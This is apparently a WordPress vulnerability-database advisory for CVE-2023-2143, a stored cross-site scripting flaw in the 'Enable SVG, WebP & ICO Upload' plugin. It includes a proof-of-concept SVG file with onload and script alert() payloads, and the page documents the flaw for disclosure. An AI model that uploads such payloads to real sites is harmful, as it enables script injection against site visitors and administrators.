WordPress Plugin Vulnerabilities

Enable SVG, WebP & ICO Upload <= 1.0.3 - Author+ Stored XSS

Description

The plugin does not sanitize SVG file contents, leading to a Cross-Site Scripting vulnerability.

Proof of Concept

1. Upload an SVG file with the following contents.
2. View the SVG file on the frontend and see the alerts.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
   onload="javascript:alert(/XSS/)"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:cc="http://creativecommons.org/ns#"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
   id="svg3013"
   sodipodi:docname="download_font_awesome.svg">
<script>alert(/XSS2/)</script>
</svg>

Affects Plugins

Plugin icon
enable-svg-webp-ico-upload
No known fix

References

CVE
CVE-2023-2143

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Mateus Machado Tesser
Submitter
Mateus Machado Tesser
Verified
Yes
WPVDB ID
91898762-aa7d-4fbc-a016-3de48901e5de

Timeline

Publicly Published
2023-06-23 (about 10 months ago)
Added
2023-06-23 (about 10 months ago)
Last Updated
2023-06-23 (about 10 months ago)

Other

Published
Title
Published
2021-12-01
Title
Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in Product XML Feeds Module
Published
2021-09-27
Title
Wappointment < 2.2.5 - Unauthenticated Stored Cross-Site Scripting
Published
2024-02-19
Title
Shortcodes Ultimate < 7.0.3 - Contributor+ Stored XSS
Published
2023-04-21
Title
Dave's WordPress Live Search <= 4.8.1 - Admin+ Stored XSS
Published
2021-04-13
Title
HT Mega - Absolute Addons for Elementor Page Builder < 1.5.7 - Contributor+ Stored XSS